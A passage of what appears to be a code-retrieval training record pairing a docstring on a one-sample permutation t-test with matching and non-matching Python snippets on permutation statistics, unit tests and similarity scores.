Z.S(**p)\n self.assertEqual(out, legacy_S(Z, **p))\n\n out = Z.S(ignore_samplesize=True, **p)\n self.assertEqual(out, legacy_S(Z, ignore_samplesize=True, **p))\n\n out = Z.A(**p)\n self.assertEqual(out, legacy_A(Z, **p))", "def permutation_test(overlap_bins, nonoverlap_bins, thresh, ntrials):\n X = num_top_snps(I(overlap_bins.values()), thresh)\n if X == 0:\n return thresh, 0, 0, 0, 1, 0, 0\n overlap_counts = {k: len(overlap_bins[k]) for k in overlap_bins}\n Y = [num_top_snps(match(overlap_counts, nonoverlap_bins), thresh) for _ in range(ntrials)]\n mean, variance = moments(Y)\n anderson, critical_values, _ = scipy.stats.anderson(Y)\n exact_p = (1 + len([y for y in Y if y >= X])) / (1 + ntrials)\n return thresh, X, mean, variance, exact_p, anderson, critical_values[2]", "def apply_permutation(l, p):\n\n for i in xrange(len(l)):\n nxt = i\n print 'change - ', i\n while p[nxt] >= 0:\n print 'before-', i, p[nxt], l, p\n\n l[i], l[p[nxt]] = l[p[nxt]], l[i]\n temp = p[nxt]\n p[nxt] -= len(p)\n nxt = temp\n print 'after -', i, p[nxt], l, p\n\n\n print l", "def make_nonparametric_ab_test(dataframe, iteration_column,\n target_column, not_normal_ids_list):\n rejected_pairs = []\n not_rejected_pairs = []\n category_list = list(itertools.combinations(not_normal_ids_list, 2))\n for i in category_list:\n ttest, p_value = mannwhitneyu(dataframe.\n loc[dataframe[iteration_column] == i[0],\n target_column],\n dataframe.\n loc[dataframe[iteration_column] == i[1],\n target_column])\n if p_value >= 0.05:\n not_rejected_pairs.append(i)\n else:\n rejected_pairs.append(i)\n return rejected_pairs, not_rejected_pairs", "def test_ppt_distinguishability_yyd_vectors():\n psi_0 = bell(0)\n psi_1 = bell(2)\n psi_2 = bell(3)\n psi_3 = bell(1)\n\n x_1 = np.kron(psi_0, psi_0)\n x_2 = np.kron(psi_1, psi_3)\n x_3 = np.kron(psi_2, psi_3)\n x_4 = np.kron(psi_3, psi_3)\n\n states = [x_1, x_2, x_3, x_4]\n probs = [1 / 4, 1 / 4, 1 / 4, 1 / 4]\n\n primal_res = ppt_distinguishability(states, probs=probs, dist_method=\"min-error\", strategy=True)\n dual_res = ppt_distinguishability(states, probs=probs, dist_method=\"min-error\", strategy=False)\n\n np.testing.assert_equal(np.isclose(primal_res, 7 / 8, atol=0.001), True)\n np.testing.assert_equal(np.isclose(dual_res, 7 / 8, atol=0.001), True)\n\n primal_res = ppt_distinguishability(\n states, probs=probs, dist_method=\"unambiguous\", strategy=True\n )\n dual_res = ppt_distinguishability(\n states, probs=probs, dist_method=\"unambiguous\", strategy=False\n )\n\n np.testing.assert_equal(np.isclose(primal_res, 3 / 4, atol=0.001), True)\n np.testing.assert_equal(np.isclose(dual_res, 3 / 4, atol=0.001), True)", "def permute(self):\n raise NotImplementedError()", "def ks_permutation_var(stat, series1, series2):\n x1 = series1\n x2 = series2\n lx1 = len(x1)\n lx2 = len(x2)\n data_x = np.concatenate([x1, x2], axis=0)\n rng = np.random.default_rng(seed=42)\n ks_res = []\n n_samp = 1000\n for j in range(n_samp):\n x_con = rng.permutation(data_x)\n x1_perm = x_con[:lx1]\n x2_perm = x_con[lx2:]\n ks_res.append(stats.ks_2samp(x1_perm, x2_perm)[0])\n ks_list = np.sort(ks_res)\n ks_arg = np.arange(start=1, stop=n_samp+1)/n_samp\n p_val = 1-np.interp(stat, ks_list, ks_arg)\n return p_val", "def permutation(self, x):\r\n x = array(x)\r\n x = roll(x, self.num_calls)\r\n self.num_calls += 1\r\n return x", "def par_test_11(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def test_permute_2d(self):\r\n a = reshape(arange(9), (3, 3))\r\n self.assertEqual(permute_2d(a, [0, 1, 2]), a)\r\n self.assertEqual(permute_2d(a, [2, 1, 0]),\r\n array([[8, 7, 6], [5, 4, 3], [2, 1, 0]]))\r\n self.assertEqual(permute_2d(a, [1, 2, 0]),\r\n array([[4, 5, 3], [7, 8, 6], [1, 2, 0]]))", "def test_tpr_fwer(self, syn_genomic_data, syn_labels, syn_labels_0based, syn_labels_cat, syn_fm, syn_idx, rep, syn_true_pvalues):\n\n window_lengths = [35]\n\n best_params_montaez = {'epochs': 500, 'l1_reg': 0.001, 'l2_reg': 0.0001,'lr' :1e-05, 'dropout_rate':0.3, 'hidden_neurons':64, 'n_snps': n_total_snps}\n\n # n_permutations = 2\n\n def combi_compute_pvalues(d, x, fm, l,filter_window_size,pf,ps,k):\n #clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30\n idx, pvalues, _ = combi_method(d, x,fm, l,filter_window_size,pf,ps,k)\n\t\t\t#combi_method(classifier,data, fm, labels, filter_window_size, pnorm_filter, psvm, top_k)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[idx] = pvalues\n del d, l\n return pvalues_filled\n\n def challenger_compute_pvalues(d, x, l_0b, l, idx):\n is_only_zeros = False\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model(best_params_montaez)\n\n model.fit(x=x[idx.train], y=l_0b[idx.train],\n validation_data=(x[idx.test], l_0b[idx.test]),\n epochs=best_params_montaez['epochs'],\n callbacks=[\n ReduceLROnPlateau(monitor='val_loss',\n mode='min'),\n ])\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha2Beta1(model)\n weights = analyzer.analyze(x).sum(0)\n\n if np.max(abs(weights)) < 0.005:\n fig, axes = plt.subplots(1)\n is_only_zeros = True\n axes.plot(np.absolute(weights).sum(axis=1))\n fig.savefig(os.path.join(IMG_DIR, 'test.png'))\n\n pvalues_list = np.zeros((len(window_lengths), weights.shape[0]))\n for i, filter_size in enumerate(window_lengths):\n top_indices_sorted, _ = postprocess_weights(\n weights, top_k, filter_size, p_svm, p_pnorm_filter)\n pvalues = chi_square(d[:, top_indices_sorted], l)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[top_indices_sorted] = pvalues\n pvalues_list[i] = pvalues_filled\n del d, x, l\n\n return pvalues_list, is_only_zeros\n\n fm_2d = syn_fm(\"2d\")\n fm_3d = syn_fm(\"3d\")\n clf = LinearSVC(penalty='l2', loss='hinge', C=1.0000e-05, dual=True, tol=1e-3, verbose=0)\n\n pvalues_per_run_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n combi_compute_pvalues)(clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30) for i in tqdm(range(rep))))\n\n pvalues_per_run_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n chi_square)(syn_genomic_data[str(i)][:], syn_labels[str(i)]) for i in tqdm(range(rep))))\n\n # len(thresholds) * len(window_sizes) * 10020\n a = Parallel(n_jobs=-1, require='sharedmem')(delayed(\n challenger_compute_pvalues)(syn_genomic_data[str(i)][:], fm_3d[str(i)][:], syn_labels_cat[str(i)], syn_labels[str(i)], syn_idx[str(i)]) for i in tqdm(range(rep)))\n\n # INNvestigate bugfix\n zeros_index = np.array(list(np.array(a)[:, 1]))\n pvalues_per_run_dense = np.array(list(np.array(a)[:, 0]))\n\n pvalues_per_run_combi = pvalues_per_run_combi[np.logical_not(zeros_index)]\n pvalues_per_run_dense = pvalues_per_run_dense[np.logical_not(zeros_index)]\n pvalues_per_run_rpvt = pvalues_per_run_rpvt[np.logical_not(zeros_index)]\n true_pvalues = syn_true_pvalues[np.logical_not(zeros_index)]\n\n # COMBI\n res_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(pvalues_per_run_combi, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n tpr_combi, _, fwer_combi, precision_combi = res_combi.T\n\n\n # T_star - WARNING TAKES FOREVER\n tpr_permuted = 0\n fwer_permuted = 0\n precision_permuted = 0\n\n \"\"\"\n for i in range(rep):\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model_2(best_params_montaez_2)\n t_star = permuted_deepcombi_method(model, h5py_data[str(i)][:], fm_3d[str(i)][:], labels[str(i)], labels_cat[str(i)], n_permutations, alpha_sig_toy, filter_window_size, top_k, mode='all' )\n ground_truth = np.zeros((1,n_total_snps),dtype=bool)\n ground_truth[:,5000:5020] = True\n tpr, _, fwer, precision = compute_metrics(pvalues_per_run_rpvt[i], ground_truth, t_star) \n tpr_permuted += tpr\n fwer_permuted += fwer\n precision_permuted += precision\n tpr_permuted/=rep\n fwer_permuted/=rep\n precision_permuted/=rep\n \"\"\"\n\n # RPVT\n\n res_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_per_run_rpvt, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_rpvt, _, fwer_rpvt, precision_rpvt = res_rpvt.T\n\n # Plot\n fig, axes = plt.subplots(2)\n fig.set_size_inches(18.5, 10.5)\n ax1, ax2 = axes\n\n ax1.set_ylim(0, 0.45)\n ax1.set_xlim(0, 0.1)\n\n ax1.set_ylabel('TPR')\n ax1.set_xlabel('FWER')\n ax1.plot(fwer_combi, tpr_combi, '-o',\n label='Combi')\n ax1.plot(fwer_rpvt, tpr_rpvt, '-o',\n label='RPVT')\n #ax1.plot(fwer_permuted, tpr_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n ax2.set_ylabel('Precision')\n ax2.set_xlabel('TPR')\n ax2.plot(tpr_combi, precision_combi, '-o',\n label='Combi')\n ax2.plot(tpr_rpvt, precision_rpvt, '-o',\n label='RPVT')\n #ax2.plot(tpr_permuted, precision_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n # Save results\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-tpr-{}'.format(ttbr)), tpr_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-fwer-{}'.format(ttbr)), fwer_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-precision-{}'.format(ttbr)), precision_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-tpr-pt{}'.format(ttbr)), tpr_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-fwer-pt{}'.format(ttbr)), fwer_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-precision-pt{}'.format(ttbr)), precision_permuted)\n\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-tpr-{}'.format(ttbr)), tpr_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-fwer-{}'.format(ttbr)), fwer_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-precision-{}'.format(ttbr)), precision_rpvt)\n\n # CHALLENGER\n for i, window in enumerate(window_lengths):\n pvalues_challenger = pvalues_per_run_dense[:, i]\n\n res_dense = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_challenger, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_dense, _, fwer_dense, precision_dense = res_dense.T\n np.save(os.path.join(NUMPY_ARRAYS, 'tpr-{}-{}'.format(window, ttbr)), tpr_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'fwer-{}-{}'.format(window, ttbr)), fwer_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'precision-{}-{}'.format(window, ttbr)), precision_dense)\n assert fwer_combi.max() <= 1 and fwer_combi.min() >= 0\n ax1.plot(fwer_dense, tpr_dense, '-x', label='DeepCOMBI')\n ax2.plot(tpr_dense, precision_dense, '-x', label='DeepCOMBI')\n\n ax1.legend()\n ax2.legend()\n fig.savefig(\n os.path.join(IMG_DIR, 'tpr_fwer_montaez_combi_newsettings.png'.format(zeros_index.sum())),\n dpi=300)", "def test_two_and_three_card_petitions(self):\n f = gtrutils.check_petition_combos\n\n self.assertTrue( f( 0, 0, [], True, True))\n\n self.assertFalse( f( 1, 0, [], True, True))\n self.assertFalse( f( 1, 0, [1], True, True))\n self.assertTrue( f( 1, 0, [2], True, True))\n self.assertTrue( f( 1, 0, [3], True, True))\n self.assertFalse( f( 1, 0, [4], True, True))\n self.assertTrue( f( 1, 1, [], True, True))\n self.assertTrue( f( 1, 2, [], True, True))\n self.assertTrue( f( 1, 3, [], True, True))\n self.assertFalse( f( 1, 4, [], True, True))\n\n self.assertFalse( f( 1, 1, [2], True, True))\n self.assertFalse( f( 1, 1, [3], True, True))\n self.assertFalse( f( 1, 2, [2], True, True))\n self.assertFalse( f( 1, 3, [2], True, True))\n self.assertFalse( f( 1, 3, [3], True, True))\n\n self.assertTrue( f( 2, 1, [2], True, True))\n self.assertTrue( f( 2, 1, [3], True, True))\n self.assertTrue( f( 2, 0, [4], True, True))\n self.assertTrue( f( 2, 0, [5], True, True))\n self.assertTrue( f( 2, 0, [6], True, True))\n self.assertTrue( f( 2, 4, [], True, True))\n self.assertTrue( f( 2, 5, [], True, True))\n self.assertTrue( f( 2, 6, [], True, True))\n \n self.assertTrue( f(13, 26, [], True, True))\n self.assertTrue( f(13, 39, [], True, True))\n self.assertTrue( f(13, 0, [26], True, True))\n self.assertTrue( f(13, 14, [12], True, True))\n self.assertTrue( f(13, 13, [10], True, True))\n self.assertTrue( f(13, 15, [11], True, True))\n self.assertFalse( f(13, 40, [], True, True))\n self.assertFalse( f(13, 11, [3], True, True))\n\n self.assertFalse( f(4, 1, [2,3,6], True, True))\n self.assertTrue( f(5, 1, [2,3,6], True, True))\n self.assertTrue( f(6, 1, [2,3,6], True, True))\n self.assertFalse( f(7, 1, [2,3,6], True, True))", "def permutations(iterable):\n pass", "def par_test_13(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def checkPermutation(s, t):\n\n # Count each unique letter in both strings and compare the two dicts.\n s_count = {}\n t_count = {}\n for character in s:\n s_count[character] = s_count.get(character, 0) + 1\n\n for character in t:\n t_count[character] = t_count.get(character, 0) + 1\n\n return s_count == t_count\n\n # Time Complexity: O(n)\n # Space Complexity: O(n)", "def trivial_phase(indivs):\r\n\tpool=make_pool(len(indivs[0]))\r\n\r\n\tfor i in xrange(1,len(pool)+1):\r\n\t\tall_combi=itertools.combinations(pool,i)\r\n\t\tfor t in all_combi:\r\n\t\t\tt+=t\r\n\t\t\tcandidate_couples=list(itertools.combinations(t,2))\r\n\t\t\tgeno_list=map(lambda x: mix(x[0],x[1]), candidate_couples)\r\n\t \t\tif check(indivs, geno_list):\r\n\t \t\t\treturn list(set(t)), candidate_couples\r\n\tprint \"It's impossible to execute this, something must be wrong.\"", "def _pfunc(i,j,perm):\n if perm[i-1] == j:\n return 1\n else:\n return 0", "def pval(self, **kwargs):\n raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def distance_matrix_permutation_test(matrix, cells, cells2=None,\r\n f=t_two_sample, tails=None, n=1000, return_scores=False,\r\n is_symmetric=True):\r\n # if matrix is symmetric convert all indices to lower trangular\r\n if is_symmetric:\r\n cells = get_ltm_cells(cells)\r\n if cells2:\r\n cells2 = get_ltm_cells(cells2)\r\n # pull out the special values\r\n special_values, other_values = \\\r\n get_values_from_matrix(matrix, cells, cells2, is_symmetric)\r\n # calc the stat and parameteric p-value for real data\r\n stat, p = f(special_values, other_values, tails)\r\n # calc for randomized matrices\r\n count_more_extreme = 0\r\n stats = []\r\n indices = range(len(matrix))\r\n for k in range(n):\r\n # shuffle the order of indices, and use those to permute the matrix\r\n permuted_matrix = permute_2d(matrix, permutation(indices))\r\n special_values, other_values = \\\r\n get_values_from_matrix(permuted_matrix, cells,\r\n cells2, is_symmetric)\r\n # calc the stat and p for a random subset (we don't do anything\r\n # with these p-values, we only use the current_stat value)\r\n current_stat, current_p = f(special_values, other_values, tails)\r\n stats.append(current_stat)\r\n if tails is None:\r\n if abs(current_stat) > abs(stat):\r\n count_more_extreme += 1\r\n elif tails == 'low':\r\n if current_stat < stat:\r\n count_more_extreme += 1\r\n elif tails == 'high':\r\n if current_stat > stat:\r\n count_more_extreme += 1\r\n\r\n # pack up the parametric stat, parametric p, and empirical p; calc the\r\n # the latter in the process\r\n result = [stat, p, count_more_extreme / n]\r\n # append the scores of the n tests if requested\r\n if return_scores:\r\n result.append(stats)\r\n return tuple(result)", "def test_pyt_multitask(self):\n\n def run_display_test(defaults, ep_and_ex_counts):\n with testing_utils.capture_output() as f:\n parser = display_setup_args()\n parser.set_defaults(**defaults)\n opt = parser.parse_args()\n display_data(opt)\n str_output = f.getvalue()\n self.assertTrue(\n '[ loaded {} episodes with a total of {} examples ]'.format(\n ep_and_ex_counts[0], ep_and_ex_counts[1]\n ) in str_output,\n 'PytorchDataTeacher multitasking failed with '\n 'following args: {}'.format(opt)\n )\n\n task1 = 'babi:task1k:1'\n task2 = 'babi:task1k:2'\n dataset1 = 'flickr30k'\n dataset2 = 'vqa_v1'\n\n # Expected example and episode counts\n eps_and_exs_counts = [\n (1800, 1800),\n (1080, 1800),\n (29900, 29900),\n (29180, 29900),\n (277349, 277349)\n ]\n defaults = parser_defaults.copy()\n\n # 1.\n defaults['pytorch_teacher_task'] = '{},{}'.format(task1, task2)\n run_display_test(defaults, eps_and_exs_counts[0])\n\n # 2.\n defaults['pytorch_teacher_task'] = task1\n defaults['task'] = task2\n run_display_test(defaults, eps_and_exs_counts[1])\n\n # 3.\n del defaults['task']\n defaults['pytorch_teacher_dataset'] = dataset1\n run_display_test(defaults, eps_and_exs_counts[2])\n\n # 4.\n del defaults['pytorch_teacher_task']\n defaults['task'] = task1\n run_display_test(defaults, eps_and_exs_counts[3])\n\n # 5.\n del defaults['task']\n defaults['pytorch_teacher_dataset'] = '{},{}'.format(dataset1, dataset2)\n run_display_test(defaults, eps_and_exs_counts[4])", "def new_permutation(V,m,adj):\r\n\r\n global tent\r\n\r\n perm = V.copy()\r\n \r\n \"\"\" try to select two vertices to swipe wisely. \"\"\"\r\n \r\n #we select 1 vertex among the m first vertices\r\n p1 = randint(0,m-1)\r\n \r\n #we select 1 vertex among the vertices left\r\n p2 = randint(m,len(V)-1)\r\n\r\n def comp(p1,p2,adj,perm):\r\n \"\"\"\r\n retrieve the degree of the 2 vertices and\r\n compare the degree\r\n Args:\r\n p1 (int): index of the vertex\r\n p2 (int): index of the vertex\r\n adj (set): set of the edges\r\n perm (int): current permutation of the vertices\r\n\r\n Returns:\r\n bool: true if degree of p2 is higher than the one of p1 ,false otherwise\r\n \"\"\"\r\n #degree of p1\r\n f1 = 0\r\n #degree of p2\r\n f2 = 0\r\n \r\n #compute the degrees\r\n for i in range(m):\r\n if (V[p1],V[i]) in adj or (V[i],V[p1]) in adj:\r\n f1 += 1\r\n\r\n for i in range(m):\r\n if (V[p2],V[i]) in adj or (V[i],V[p2]) in adj:\r\n f2 += 1\r\n \r\n if f2 > f1:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_prior(p1,p2,adj,perm,tent):\r\n \"\"\"\r\n recursive function which try to swipe the 2 vertices \r\n by comparing the degre of the vertexe.\r\n\r\n Args:\r\n p1 (int): index of the vertex\r\n p2 (int): index of the vertex\r\n d (set): set of the edges\r\n perm (set): new permutation\r\n tent (int): we fix the swipe process to tent try.\r\n\r\n Returns:\r\n int: the new neighbor aka permutation\r\n \"\"\"\r\n \r\n #if the degree of the node p2 is higher or if the try is over we swipe \r\n if comp(p1,p2,adj,perm) or tent == 0:\r\n temp = perm[p1]\r\n perm[p1] = perm[p2]\r\n perm[p2] = temp\r\n return perm\r\n \r\n tent -= 1\r\n \r\n #select a new vertex to swipe\r\n p2 = randint(m,len(V)-1)\r\n\r\n return check_prior(p1,p2,adj,perm,tent)\r\n \r\n return check_prior(p1,p2,adj,perm,tent)", "def check_sample_correctishness_bc01(f):\n\n batch_size = 5\n rows = 32\n cols = 30\n channels = 3\n pool_rows = 2\n pool_cols = 3\n\n rng = np.random.RandomState([2012, 9, 26])\n zv = rng.randn(batch_size, channels, rows,\n cols).astype(config.floatX) * 2. - 3.\n top_down_v = rng.randn(batch_size, channels, rows / pool_rows,\n cols / pool_cols).astype(config.floatX)\n\n z_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n z_th.tag.test_value = zv\n z_th.name = 'z_th'\n\n top_down_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n top_down_th.tag.test_value = top_down_v\n top_down_th.name = 'top_down_th'\n\n theano_rng = MRG_RandomStreams(rng.randint(2147462579))\n p_th, h_th, p_sth, h_sth = f(z_th, (pool_rows, pool_cols), top_down_th,\n theano_rng)\n\n prob_func = function([z_th, top_down_th], [p_th, h_th])\n pv, hv = prob_func(zv, top_down_v)\n\n sample_func = function([z_th, top_down_th], [p_sth, h_sth])\n\n acc_p = 0. * pv\n acc_h = 0. * hv\n\n # make sure the test gets good coverage, ie, that it includes many\n # different activation probs for both detector and pooling layer\n buckets = 10\n bucket_width = 1. / float(buckets)\n for i in xrange(buckets):\n lower_lim = i * bucket_width\n upper_lim = (i+1) * bucket_width\n\n assert np.any((pv >= lower_lim) * (pv < upper_lim))\n assert np.any((hv >= lower_lim) * (hv < upper_lim))\n\n assert upper_lim == 1.\n\n for i in xrange(10000):\n ps, hs = sample_func(zv, top_down_v)\n\n assert ps.shape == pv.shape\n assert hs.shape == hv.shape\n\n acc_p += ps\n acc_h += hs\n\n est_p = acc_p / float(i+1)\n est_h = acc_h / float(i+1)\n\n pd = np.abs(est_p-pv)\n hd = np.abs(est_h-hv)\n\n \"\"\"\n # plot maps of the estimation error, this is to see if it has some\n # spatial pattern this is useful for detecting bugs like not handling\n # the border correctly, etc.\n from pylearn2.gui.patch_viewer import PatchViewer\n\n pv = PatchViewer((pd.shape[0],pd.shape[3]),(pd.shape[1],pd.shape[2]),\n is_color = False)\n for i in xrange(pd.shape[0]):\n for j in xrange(pd.shape[3]):\n pv.add_patch( (pd[i,:,:,j] / pd.max() )* 2.0 - 1.0, rescale = False)\n pv.show()\n\n pv = PatchViewer((hd.shape[0],hd.shape[3]), (hd.shape[1],hd.shape[2]),\n is_color = False)\n for i in xrange(hd.shape[0]):\n for j in xrange(hd.shape[3]):\n pv.add_patch( (hd[i,:,:,j] / hd.max() )* 2.0 - 1.0, rescale = False)\n pv.show()\n \"\"\"\n\n \"\"\"\n plot expectation to estimate versus error in estimation\n expect bigger errors for values closer to 0.5\n\n from matplotlib import pyplot as plt\n\n #nelem = reduce( lambda x, y : x*y, pd.shape)\n #plt.scatter( pv.reshape(nelem), pd.reshape(nelem))\n #plt.show()\n\n nelem = reduce( lambda x, y : x*y, hd.shape)\n plt.scatter( hv.reshape(nelem), hd.reshape(nelem))\n plt.show()\n \"\"\"\n\n # don't really know how tight this should be\n # but you can try to pose an equivalent problem\n # and implement it in another way\n # using a numpy implementation in softmax_acc.py\n # I got a max error of .17\n assert max(pd.max(), hd.max()) < .17\n\n # Do exhaustive checks on just the last sample\n assert np.all((ps == 0) + (ps == 1))\n assert np.all((hs == 0) + (hs == 1))\n\n for k in xrange(batch_size):\n for i in xrange(ps.shape[2]):\n for j in xrange(ps.shape[3]):\n for l in xrange(channels):\n p = ps[k, l, i, j]\n h = hs[k, l, i*pool_rows:(i+1)*pool_rows,\n j*pool_cols:(j+1)*pool_cols]\n assert h.shape == (pool_rows, pool_cols)\n assert p == h.max()\n assert h.sum() <= 1\n\n \"\"\" If you made it to here, it's correctish\n (cant tell if samples are perfectly \"correct\") \"\"\"", "def test_random_permute_inverse_subdivide(self):\n # reproducible arbitrariness\n np.random.seed(121)\n\n nchan = 3\n nsteps = 20\n rho = 1.0/2\n subdiv = 2\n target = np.random.randn(nchan, nsteps)\n\n controller = LinearController(self.G, target, tau=None)\n\n controller.set_random_permute_inverse(rho, subdivide_by=subdiv)\n self.assertIsNotNone(controller.permute_inverse)\n\n n_per_group = self.N/nchan\n groups0 = np.arange(self.N)/n_per_group\n groups1 = controller.permute_inverse/n_per_group\n\n n_per_subgroup = self.N/(subdiv*nchan)\n subgroups0 = np.arange(self.N)/n_per_subgroup\n subgroups1 = controller.permute_inverse/n_per_subgroup\n\n # check that the right fraction of assignments are kept intact\n self.assertEqual(np.sum(subgroups0 != subgroups1), rho*self.N)\n \n # but that some of the mismatches end up *within the same group*\n # (though they come from different subgroups)\n self.assertNotEqual(np.sum(groups0 != groups1), rho*self.N)" ]
[ "0.6563847", "0.65312606", "0.627106", "0.625189", "0.62488693", "0.6234156", "0.62234485", "0.6194745", "0.60110074", "0.59988236", "0.59065497", "0.5900468", "0.5838992", "0.5809497", "0.58039767", "0.5691553", "0.5606442", "0.5583079", "0.555996", "0.5553208", "0.55497146", "0.5531961", "0.5531961", "0.5526118", "0.5522027", "0.55111307", "0.55111307", "0.5509063", "0.5491687", "0.54826397", "0.54384124", "0.54384124", "0.5420511", "0.5420511", "0.5404128", "0.5353955", "0.5343847", "0.534128", "0.53398603", "0.53244746", "0.5302059", "0.52775323", "0.5273417", "0.5260378", "0.5251287", "0.52492183", "0.5245074", "0.5237367", "0.5207702", "0.52052677", "0.5189326", "0.5186474", "0.5184592", "0.5183656", "0.51760894", "0.51550174", "0.5147022", "0.51405764", "0.5130323", "0.5127566", "0.51268244", "0.5125291", "0.51248556", "0.51247233", "0.509714", "0.5083651", "0.50772065", "0.5075498", "0.5070687", "0.5067533", "0.5067533", "0.50591385", "0.5044336", "0.5043314", "0.5031892", "0.5027236", "0.5012972", "0.50089496", "0.500643", "0.50019443", "0.4996388", "0.49876213", "0.49751693", "0.4966647", "0.49662727", "0.4960101", "0.4958931", "0.49357003", "0.4935416", "0.49343413", "0.493085", "0.49285552", "0.49198192", "0.49142802", "0.49130467", "0.491064", "0.49074996", "0.49026063", "0.49011618", "0.4894371", "0.48929977" ]
0.0
-1
One sample/paired sample permutation test based on a tstatistic. This function can perform the test on one variable or simultaneously on multiple variables. When applying the test to multiple variables, the "tmax" method is used for adjusting the pvalues of each variable for multiple comparisons. Like Bonferroni correction, this method adjusts pvalues in a way that controls the familywise error rate. However, the permutation method will be more powerful than Bonferroni correction when different variables in the test
def permutation_t_test( X, n_permutations=10000, tail=0, n_jobs=None, seed=None, verbose=None ): from .cluster_level import _get_1samp_orders n_samples, n_tests = X.shape X2 = np.mean(X**2, axis=0) # precompute moments mu0 = np.mean(X, axis=0) dof_scaling = sqrt(n_samples / (n_samples - 1.0)) std0 = np.sqrt(X2 - mu0**2) * dof_scaling # get std with var splitting T_obs = np.mean(X, axis=0) / (std0 / sqrt(n_samples)) rng = check_random_state(seed) orders, _, extra = _get_1samp_orders(n_samples, n_permutations, tail, rng) perms = 2 * np.array(orders) - 1 # from 0, 1 -> 1, -1 logger.info("Permuting %d times%s..." % (len(orders), extra)) parallel, my_max_stat, n_jobs = parallel_func(_max_stat, n_jobs) max_abs = np.concatenate( parallel( my_max_stat(X, X2, p, dof_scaling) for p in np.array_split(perms, n_jobs) ) ) max_abs = np.concatenate((max_abs, [np.abs(T_obs).max()])) H0 = np.sort(max_abs) if tail == 0: p_values = (H0 >= np.abs(T_obs[:, np.newaxis])).mean(-1) elif tail == 1: p_values = (H0 >= T_obs[:, np.newaxis]).mean(-1) elif tail == -1: p_values = (-H0 <= T_obs[:, np.newaxis]).mean(-1) return T_obs, p_values, H0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... {:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def post_hoc_perm(conditions, n_shuffles, dataframe, method = scipy.stats.ttest_rel, seed = 1010):\n \n np.random.seed(seed)\n\n pairs = [pair for pair in itertools.combinations(conditions, 2)]\n n_pairs = len(pairs)\n\n t = np.floor(n_pairs * 0.25)\n\n obs_cond = {}\n perm_cond = {}\n p_cond = {}\n p_ph = {}\n\n maxT = np.zeros(n_shuffles)\n\n #First loop: Generate permutations\n for n, pair in enumerate(pairs):\n\n if n % t == 0:\n print((n / n_pairs) * 100)\n\n term = pair[0] + '_vs_' + pair[1]\n obs, perm, p = t_perm(dataframe[pair[0]], dataframe[pair[1]], n_shuffles, term)\n obs_cond.update(obs)\n perm_cond.update(perm)\n p_cond.update(p)\n\n\n\n for n in range(0, n_shuffles):\n shuffle = np.array([shuffles[n] for shuffles in perm_cond.values()])\n maxT[n] = shuffle[np.squeeze(np.where(abs(shuffle) == np.max(np.abs(shuffle))))]\n\n p_ph = {cond: sum(abs(maxT) >= 